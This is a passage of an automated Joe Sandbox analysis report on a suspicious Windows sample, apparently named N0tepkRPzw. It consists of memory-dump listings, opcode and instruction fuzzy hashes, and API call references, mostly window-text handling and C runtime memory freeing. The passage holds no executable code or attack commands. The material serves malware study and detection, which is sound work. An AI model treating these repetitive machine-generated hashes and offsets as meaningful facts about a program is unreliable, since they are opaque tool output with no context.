              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction ID: 40bd91c083b52f2cc198057c2c6d2af9488d325865da53a0e7af625be2bc4b70
              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction Fuzzy Hash: 7AC181362151938ADB2D4639853413FFEA15AA27B131EC75EE4BACB1C4FE20D564DA30
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction ID: 5ae57cb3c7632dfe2fcb1f1aa7c14574c2de167196728d9e41fa674b19a7594e
              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction Fuzzy Hash: 3FC1923A2191934ADF2D463E853413FBEA15AA27B131EC76DD8BACB0D5FE20D524D630
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction ID: cfc6ab9e2a6be8c3a31b2d4604cdbb0d7cd45c7bd9ba641ad918fde49e4a0f4e
              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction Fuzzy Hash: D8C170362051A38AEF2D4639857413FBEA15AA27B131EC76DD4BACB1C5FE20D524DA30
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: bb1607ad77933c762171606609c77d2e35d85b159596b4194d029930536fd850
              • Instruction ID: b01f7d3298f6c8a3f53f786368af8faadea131134ec4ab670b870c8c458f6db9
              • Opcode Fuzzy Hash: bb1607ad77933c762171606609c77d2e35d85b159596b4194d029930536fd850
              • Instruction Fuzzy Hash: 18D1F2B1A483459FDB14CF68C88075BBBE4EF95308F08456DEC849B642D734E958CBBA
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction ID: 6a9d9725ba57f5027f4dbb1bc3898e90b537e3fd95c225020302f6364b729052
              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction Fuzzy Hash: 98C18F362051938ADF2D863A853403FBEA15AA27B131ED76DD4BBCB1D5FE20D524DA30
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c85be511e349482fdfc7cdc07386c433b17eff6f576ab5a3e460f96427f1c6ca
              • Instruction ID: 0b35fe308efdbaf718ae4374c47ad50799a531a829e8d863192fcbca72d9c4eb
              • Opcode Fuzzy Hash: c85be511e349482fdfc7cdc07386c433b17eff6f576ab5a3e460f96427f1c6ca
              • Instruction Fuzzy Hash: 50E14B755083848FC304DF29D49096ABBF0BF8A340F85095EF9D997352C336EA19DBA2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction ID: 38a0903c7206545871974b70ce8ef0f15f40a99b17b9b9152b2fc43b78a522fe
              • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction Fuzzy Hash: 529138702047498BDB24EF6CD891BBA77E5EB90300F14092DF99797282DA74D649C772
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 065975bb117dfbf200cabab8d95ec826e8af04cf2e83277f1dfae43d78adbbac
              • Instruction ID: 54a28abae32a51078d887ba0ec391cdb7137bfd1f4bd6a70d272201008a1a682
              • Opcode Fuzzy Hash: 065975bb117dfbf200cabab8d95ec826e8af04cf2e83277f1dfae43d78adbbac
              • Instruction Fuzzy Hash: E1617B7168070957DE3A89285955BBF3388DB41308F1CCA1EE68EDB281F751DD41CB7A
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction ID: a02ffa3f59bd96d803fe3259b144bec9cce0555f2edb82b2976638ecd601230b
              • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction Fuzzy Hash: 327128717043454BDB24DE2CC8D0BAD77E5EFA4304F044A2DF9C68B282DA75DA8987B2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction ID: 65395b9b3af77718a1ab3aad9fcfcf4be28517173c53d77d2aeecca589673369
              • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction Fuzzy Hash: 13513570600A8896DB3F89688855BBF2789DB53300F5CC509E98EDB282F715DD4193F3
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac48d7ae4e1651b8a90c701f136bb54b2530476a3c19812c69404e663452b0b9
              • Instruction ID: 098e153729713e7edbf93803d6ad40e3cd75294c5592b35e9c5f4a10683d27d3
              • Opcode Fuzzy Hash: ac48d7ae4e1651b8a90c701f136bb54b2530476a3c19812c69404e663452b0b9
              • Instruction Fuzzy Hash: 87816D812197E4AECB5A6F7D78A52B53FA15733241B1D00BBC8CAC63A7C13A865CD731
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b9ca8c48f10246650245209c0a75f66e3074650ecb2b9682791c8d79851671e
              • Instruction ID: c741e4c141a177ae12ce950f3f32899b0d56f22b55dee8435fb9d8a636b55c25
              • Opcode Fuzzy Hash: 1b9ca8c48f10246650245209c0a75f66e3074650ecb2b9682791c8d79851671e
              • Instruction Fuzzy Hash: 3A51C2319093D24ECB1ADF24914446EBFE1BEDA315F49489EECD54B203D221974ECBB2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0bc8f84f383d1685f7d3f2f2c816ed877aa0695ce909dbc9e712891591b6a717
              • Instruction ID: f30def72200e78bb33dfef9a56943484d5c4e625eb4ed6a709c7bc9386ff29c6
              • Opcode Fuzzy Hash: 0bc8f84f383d1685f7d3f2f2c816ed877aa0695ce909dbc9e712891591b6a717
              • Instruction Fuzzy Hash: 67512571A087028BC748CF19D48059AF7E1FF88354F058A2EE899A7740DB34EA59CB96
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction ID: 87b3fca8f03c3b96b422879c5a7b930e8d599a37e3302e5374d0763dea4cb3a4
              • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction Fuzzy Hash: A531D2B16147558FCB14DF28C8512AABBE0FB95301F144A2DE8D5C7742C739EA49CBB2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 02e4796520fb9c3d7b99bb1e5505aa64b7c001a5f6e9e460dd9299716fc2f46a
              • Instruction ID: 6b0ddd4c38db4b8aeb5595365ed420d4dd3ebea2aab3092227ede98b640ed9e9
              • Opcode Fuzzy Hash: 02e4796520fb9c3d7b99bb1e5505aa64b7c001a5f6e9e460dd9299716fc2f46a
              • Instruction Fuzzy Hash: 82219872A202614FCB49CF2DECA08367751AB8631174B812BFE46DB3D5C535E925CBB0
              APIs
              • _swprintf.LIBCMT ref: 00D5DABE
                • Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D
                • Part of subcall function 00D61596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D90EE8,00000200,00D5D202,00000000,?,00000050,00D90EE8), ref: 00D615B3
              • _strlen.LIBCMT ref: 00D5DADF
              • SetDlgItemTextW.USER32(?,00D8E154,?), ref: 00D5DB3F
              • GetWindowRect.USER32(?,?), ref: 00D5DB79
              • GetClientRect.USER32(?,?), ref: 00D5DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 00D5DC25
              • GetWindowRect.USER32(?,?), ref: 00D5DC52
              • SetWindowTextW.USER32(?,?), ref: 00D5DC95
              • GetSystemMetrics.USER32(00000008), ref: 00D5DC9D
              • GetWindow.USER32(?,00000005), ref: 00D5DCA8
              • GetWindowRect.USER32(00000000,?), ref: 00D5DCD5
              • GetWindow.USER32(00000000,00000002), ref: 00D5DD47
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              • Opcode ID: 250dc51517d330763e237076b924d3c6929c6219bc21c27dfcead4ec6f5badc1
              • Instruction ID: 67fec86c1ecd6fcf804e7544416df63136149edc07b3e73e5bc597cce42e2e5e
              • Opcode Fuzzy Hash: 250dc51517d330763e237076b924d3c6929c6219bc21c27dfcead4ec6f5badc1
              • Instruction Fuzzy Hash: AD818172108341AFD720DF68CD85E6BBBEAEB88705F04091DFA89D3250D670E909CB72
              APIs
              • ___free_lconv_mon.LIBCMT ref: 00D7C277
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE2F
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE41
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE53
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE65
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE77
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE89
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE9B
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEAD
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEBF
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BED1
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEE3
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEF5
                • Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BF07
              • _free.LIBCMT ref: 00D7C26C
                • Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
                • Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506
              • _free.LIBCMT ref: 00D7C28E
              • _free.LIBCMT ref: 00D7C2A3
              • _free.LIBCMT ref: 00D7C2AE
              • _free.LIBCMT ref: 00D7C2D0
              • _free.LIBCMT ref: 00D7C2E3
              • _free.LIBCMT ref: 00D7C2F1
              • _free.LIBCMT ref: 00D7C2FC
              • _free.LIBCMT ref: 00D7C334
              • _free.LIBCMT ref: 00D7C33B
              • _free.LIBCMT ref: 00D7C358
              • _free.LIBCMT ref: 00D7C370
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
